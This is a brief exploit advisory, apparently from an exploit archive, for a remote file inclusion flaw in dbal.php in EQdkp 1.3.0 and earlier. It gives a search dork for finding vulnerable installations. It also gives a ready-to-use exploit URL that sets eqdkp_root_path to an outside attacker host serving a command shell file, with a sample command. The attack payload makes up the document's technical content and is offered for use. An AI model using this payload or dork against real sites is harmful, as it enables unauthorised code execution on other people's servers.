id: 407
date: 05/06/2006
title: EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability
author: OLiBekaS
cves: 

=============================================================
EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability
=============================================================




Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls



#  0day.today [2023-03-25]  #